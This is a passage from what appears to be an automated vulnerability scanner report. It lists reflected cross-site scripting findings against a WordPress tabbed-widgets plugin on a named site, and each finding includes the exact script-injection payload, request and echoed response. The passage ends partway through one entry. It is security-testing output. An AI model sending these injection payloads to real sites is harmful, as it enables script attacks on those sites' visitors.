Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/jsed152\"><script>alert(1)</script>fc9de5f9c8a/jquery-cookie.min.js" />
...[SNIP]...

1.213. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75ae9"><script>alert(1)</script>d8f6f0d1bd3 was submitted in the REST URL parameter 5. This input was echoed as 75ae9\"><script>alert(1)</script>d8f6f0d1bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js75ae9"><script>alert(1)</script>d8f6f0d1bd3 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:43 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js/jquery-cookie.min.js75ae9\"><script>alert(1)</script>d8f6f0d1bd3" />
...[SNIP]...

1.214. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6201e"><script>alert(1)</script>056c72dfbd7 was submitted in the REST URL parameter 1. This input was echoed as 6201e\"><script>alert(1)</script>056c72dfbd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content6201e"><script>alert(1)</script>056c72dfbd7/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:35 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content6201e\"><script>alert(1)</script>056c72dfbd7/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js" />
...[SNIP]...

1.215. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d19f"><script>alert(1)</script>9641c2566cb was submitted in the REST URL parameter 2. This input was echoed as 9d19f\"><script>alert(1)</script>9641c2566cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9d19f"><script>alert(1)</script>9641c2566cb/tabbed-widgets/js/jquery-ui-accordion.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins9d19f\"><script>alert(1)</script>9641c2566cb/tabbed-widgets/js/jquery-ui-accordion.min.js" />
...[SNIP]...

1.216. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87c4"><script>alert(1)</script>c49927ebe9 was submitted in the REST URL parameter 3. This input was echoed as a87c4\"><script>alert(1)</script>c49927ebe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgetsa87c4"><script>alert(1)</script>c49927ebe9/js/jquery-ui-accordion.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:38 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgetsa87c4\"><script>alert(1)</script>c49927ebe9/js/jquery-ui-accordion.min.js" />
...[SNIP]...

1.217. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3366e"><script>alert(1)</script>19c0b7c3a1a was submitted in the REST URL parameter 4. This input was echoed as 3366e\"><script>alert(1)</script>19c0b7c3a1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/js3366e"><script>alert(1)</script>19c0b7c3a1a/jquery-ui-accordion.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:40 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js3366e\"><script>alert(1)</script>19c0b7c3a1a/jquery-ui-accordion.min.js" />
...[SNIP]...

1.218. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44034"><script>alert(1)</script>0cb6d32e4c4 was submitted in the REST URL parameter 5. This input was echoed as 44034\"><script>alert(1)</script>0cb6d32e4c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js44034"><script>alert(1)</script>0cb6d32e4c4 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:42 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js44034\"><script>alert(1)</script>0cb6d32e4c4" />
...[SNIP]...

1.219. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b95"><script>alert(1)</script>a48f0c4b268 was submitted in the REST URL parameter 1. This input was echoed as 12b95\"><script>alert(1)</script>a48f0c4b268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content12b95"><script>alert(1)</script>a48f0c4b268/plugins/tabbed-widgets/js/jquery-ui-effects.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:35 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content12b95\"><script>alert(1)</script>a48f0c4b268/plugins/tabbed-widgets/js/jquery-ui-effects.min.js" />
...[SNIP]...

1.220. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5898"><script>alert(1)</script>9a24ab82fe4 was submitted in the REST URL parameter 2. This input was echoed as f5898\"><script>alert(1)</script>9a24ab82fe4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsf5898"><script>alert(1)</script>9a24ab82fe4/tabbed-widgets/js/jquery-ui-effects.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/pluginsf5898\"><script>alert(1)</script>9a24ab82fe4/tabbed-widgets/js/jquery-ui-effects.min.js" />
...[SNIP]...

1.221. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ca3"><script>alert(1)</script>d117a564d89 was submitted in the REST URL parameter 3. This input was echoed as 44ca3\"><script>alert(1)</script>d117a564d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets44ca3"><script>alert(1)</script>d117a564d89/js/jquery-ui-effects.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:37 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets44ca3\"><script>alert(1)</script>d117a564d89/js/jquery-ui-effects.min.js" />
...[SNIP]...

1.222. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c4cc"><script>alert(1)</script>4f4e37b43d6 was submitted in the REST URL parameter 4. This input was echoed as 1c4cc\"><script>alert(1)</script>4f4e37b43d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/js1c4cc"><script>alert(1)</script>4f4e37b43d6/jquery-ui-effects.min.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:39 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js1c4cc\"><script>alert(1)</script>4f4e37b43d6/jquery-ui-effects.min.js" />
...[SNIP]...

1.223. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a524"><script>alert(1)</script>c3b27702d45 was submitted in the REST URL parameter 5. This input was echoed as 7a524\"><script>alert(1)</script>c3b27702d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js7a524"><script>alert(1)</script>c3b27702d45 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:42 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js7a524\"><script>alert(1)</script>c3b27702d45" />
...[SNIP]...

1.224. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/tabbed-widgets.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c613f"><script>alert(1)</script>26275753748 was submitted in the REST URL parameter 1. This input was echoed as c613f\"><script>alert(1)</script>26275753748 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentc613f"><script>alert(1)</script>26275753748/plugins/tabbed-widgets/tabbed-widgets.php HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:35 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-contentc613f\"><script>alert(1)</script>26275753748/plugins/tabbed-widgets/tabbed-widgets.php" />
...[SNIP]...

1.225. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/tabbed-widgets.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ccc0"><script>alert(1)</script>c72d707a232 was submitted in the REST URL parameter 2. This input was echoed as 3ccc0\"><script>alert(1)</script>c72d707a232 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins3ccc0"><script>alert(1)</script>c72d707a232/tabbed-widgets/tabbed-widgets.php HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:37 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins3ccc0\"><script>alert(1)</script>c72d707a232/tabbed-widgets/tabbed-widgets.php" />
...[SNIP]...

1.226. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/tabbed-widgets.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7533"><script>alert(1)</script>626361e9619 was submitted in the REST URL parameter 3. This input was echoed as f7533\"><script>alert(1)</script>626361e9619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgetsf7533"><script>alert(1)</script>626361e9619/tabbed-widgets.php HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:39 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgetsf7533\"><script>alert(1)</script>626361e9619/tabbed-widgets.php" />
...[SNIP]...

1.227. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/plugins/tabbed-widgets/tabbed-widgets.php

Issue detail

